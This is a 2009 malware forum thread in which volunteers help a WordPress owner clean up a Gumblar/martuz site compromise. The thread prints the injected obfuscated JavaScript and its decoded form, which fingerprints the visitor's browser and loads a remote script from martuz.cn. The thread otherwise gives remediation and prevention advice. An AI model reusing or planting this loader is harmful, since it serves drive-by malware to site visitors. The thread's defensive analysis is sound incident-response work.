Malware Domain List

Malware Related => Compromised Servers => Topic started by: garethplu on May 19, 2009, 11:09:38 pm

Title: [SPLIT] garethplu
Post by: garethplu on May 19, 2009, 11:09:38 pm
If someones website goes to "martuz.cn" what can they do to fix it?
Title: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 11:00:15 am
1. Remove all malicious scripts from ALL files (i.e. restore a backup)
2. Lockdown ALL scripts (JS and PHP etc), and change FTP etc passwords
Title: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 05:47:50 pm
Thanks, how can I do that?  Is there a step-by-step guide I can follow for someone with basic skills.  Will my website host be able to help also?
Title: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 05:59:58 pm
Your host may have a backup, but you shouldn't rely on that. They will however, be able to reset your FTP etc passwords for you.

If you don't have a clean copy of the websites files (e.g. stored locally on your computer), then your choices are severely limited as they are;

1. Download all of the files, and run through their respective source codes, and remove the malicious source code
2. Start the website from scratch
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 06:19:51 pm
How do I know what the malicious source code is?
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 06:31:56 pm
Can you post the URL to your website?
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 06:34:10 pm
http://www.stadiatech.com

The one that really puzzles me. I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn" is that normal?!!!

MysteryFCM: URL disabled
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 06:41:12 pm
Looking at your sites source code, shows the following;

Code: [Select]
(function(DBCp){var O7l='%';eval(unescape((':76ar:20a:3d:22ScriptEngine:22:2cb:3d:22V:65r:73:69on():2b:22:2cj:3d:22:22:2cu:3d:6eaviga:74:6fr:2eu:73er:41g:65n:74:3bif((u:2einde:78Of(:22:43:68rom:65:22):3c:30):26:26(u:2eind:65xOf(:22W:69n:22):3e0):26:26(u:2eindexOf(:22NT:206:22:29:3c0):26:26(do:63ument:2ec:6fokie:2e:69nde:78Of(:22miek:3d1:22:29:3c:30):26:26:28:74y:70eo:66(z:72v:7at:73):21:3dtypeo:66(:22A:22))):7b:7a:72v:7ats:3d:22:41:22:3beva:6c(:22if:28wi:6ed:6f:77:2e:22+a+:22:29j:3dj+:22+a:2b:22:4da:6ao:72:22+b+a+:22M:69nor:22:2bb+:61+:22:42u:69l:64:22:2bb+:22:6a:3b:22):3bd:6fc:75ment:2ewrite:28:22:3cscript:20src:3d:2f:2fmart:22:2b:22uz:2ec:6e:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2f:73c:72ipt:3e:22):3b:7d').replace(DBCp,O7l)))})(/\:/g);

Which decodes to;

Code: [Select]
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}
You're rather lucky here, aslong as the script is the same in all files, as all you need to do is search for the string "mart", as the obfuscation is extremely basic.

On your homepage, this script appears just next to the "HEAD" HTML tag;

Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 06:42:21 pm
The one that really puzzles me. I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn" is that normal?!!!

It depends entirely on the settings of the browser and the firewall (i.e. if the browser is set to block Javascript it won't load, and if the firewall is corporately owned, it's likely already set to block this domain)
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 06:49:26 pm
Since you're using WordPress by the way, the main files you need to reinstall and/or clean, are your themes (located in /wp-content/themes), though I'd recommend checking ALL of the files just to be on the safe side, as chances are, they'll have also uploaded a shell to enable them to re-access your site, should the FTP credentials be changed. If you're comfortable doing so, it will be much quicker and much easier, to delete the WordPress files, and re-upload a clean copy of them (you can obtain the WordPress files from wordpress.org)
Title: Re: [SPLIT] garethplu
Post by: SysAdMini on May 20, 2009, 07:00:55 pm
I recommend to delete all files at your site and to restore everything
from a clean backup. Some php files have been added by this malware, for
example /images/gifimg.php. I don't recommend to sort out the files manually.

Please change the password of your site and restore your site completely from a backup.
Don't try to fix individual files if you don't know exactly why you are doing.
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 07:35:50 pm
If it comes to it can I pay someone to fix this and similiar problems?
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 08:09:12 pm
Your hosting company would probably be happy to do it for you. If not, post back here and I'll do it for free for you.
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 08:16:07 pm
Cheers dude, the world needs more people like you.

I shall speak with the host and see what they say.  The RSS no longer works, do you think its related?
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 08:17:25 pm
More than likely, yes.
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 08:22:29 pm
Damn.

I've tried a feed validator http://feedvalidator.org/check.cgi?url=http%3A%2F%2Fwww.stadiatech.com%2Ffeed#l241

and it tells me that line 241 is wrong.  I have been using the Wordpress forum for two days now but the operator of the forum keeps tell me to find the code.  Im not sure how to find the code, what code Im looking for or what to if I find it.

I have changed my FTP password btw.
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 08:45:25 pm
The feed likely won't validate whilst the code is present.

Follow the steps below to clean it out;

1. Login to your site via FTP
2. Delete the contents of the htdocs/wwwroot/public_html (or whichever it's called) folder
3. Download the following and extract the contents;

http://wordpress.org/latest.zip

4. Upload the ENTIRE contents of the zip

IMPORTANT: You MUST ensure you make a copy of your wp-config.php file BEFORE doing step 2, as you'll need the database credentials and information, present in this file, to put into the new wp-config.php file, prior to uploading it

Please note, once this is done, you will need to re-install any plugins you had installed.
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 08:58:25 pm
Sorry Steve,

I've had a good look and I dont recognise this file or anything based on "wwwroot" or "public_html" : "htdocs/wwwroot/public_html"

I notice the zip file is of 2.7.1 which I have installed (this install led to the problem)

Many thanks for the help your giving by the way.
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 09:11:20 pm
No problem.

If you'd prefer I do it for you, please e-mail me at;

mdl @ it-mate.co.uk

The only thing I'll need is your FTP credentials.
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 21, 2009, 05:09:51 pm
Hi,

This is what my host came back to me with:

"I visited and checked your website www.stadiatech.com but it does not
prompt for a virus threat and also the site loads just fine. It did not
even tried to redirect the page to  martuz.cn."

I'm starting to find this very stressful.  I dont know why my host cant find the problem and fix it.
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 21, 2009, 05:15:34 pm
I've just checked, and the problem is definately still there. Either they didn't look properly, used a browser with JS disabled, or both. Feel free to point them here if need be;

http://vurl.mysteryfcm.co.uk/?url=625774

The script is on line #39
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 21, 2009, 05:28:40 pm
Thats whats they told me on the Wordpress website but I cant find that code. 

If I delete that will it sort this problem?

Thanks.
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 21, 2009, 05:36:27 pm
You could just delete the code, yes (see /wp-content/themes/{theme}/header.php), however, these types of attacks have usually seen extra files added, so they can still get in even when the FTP password is changed, so it's a much better idea just to do a complete refresh.

As mentioned, we'll be happy to help you do this if necessary :)
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 21, 2009, 09:15:40 pm
Thanks Steve, so how did the code get in their.   Is it a virus and does it have a pirticular purpose.  Is their way of ensuring it doesn't happen again. 

How did you get so knowledgable about this stuff?
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 21, 2009, 10:01:23 pm
Most of the gumblar/martuz infections, are done by sniffing the computer that usually connects to it, for FTP etc passwords (which also means you'll need to check your machine), for details, please refer to;

http://www.malwaredomainlist.com/forums/index.php?topic=2892.msg9833#msg9833
http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/

One of the samples we've seen, have shown it to create both a _.exe and e.bat file (amongst other things) in the root of the infected machine (usually C:\), so it will be worth checking your machine for signs of this infection. For details, please see;

http://www.threatexpert.com/report.aspx?md5=2131112053ed144c46277b9024bcf39f

As far as prevention of this happening again, there are a couple of things you can do;

1. Change your FTP password (I know you've done that already, but I suggest doing it frequently (at least weekly))
2. DO NOT use regular FTP as passwords are sent in plain text - use sFTP (Secure FTP) instead if your host allows it
3. Backup your site frequently - this way, if it does happen again, you can just delete the current files, and restore the backup (again, the backup should be stored in a secure location)
4. Keep your computer up to date (e.g. install Windows patches and such) - not guaranteed to prevent it, but will help
5. Install a firewall on your local computer (this will also help prevent infections sending out your data - again not a guarantee, but will help)

Finally, and most importantly - keep WordPress (and any plugins you have installed) up to date - this will help prevent infections occuring via SQL injection etc.

Again however, none of the above will guarantee to prevent this occuring again - there are no guarantees when it comes to this type of thing unfortunately.

As for how I became knowledgeable, I'm self taught ;) (you'll usually find this is the same for the vast majority of people)
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 22, 2009, 04:35:48 pm
Thanks Steve,

I have now recived an email from Google.

Thanks for your advice but how do I follow points 2 and 3.

What is Secure FTP and how do I backup the site?
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 22, 2009, 05:02:56 pm
sFTP is done in pretty much the same fashion as FTP;

http://winscp.net/eng/docs/protocols#sftp
http://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol

With regards to backing up your site, the easiest way to backup the files, is by FTP. Your sites database can be backed up either via the WordPress ACP, or via phpMyAdmin (if you've got it installed on the server)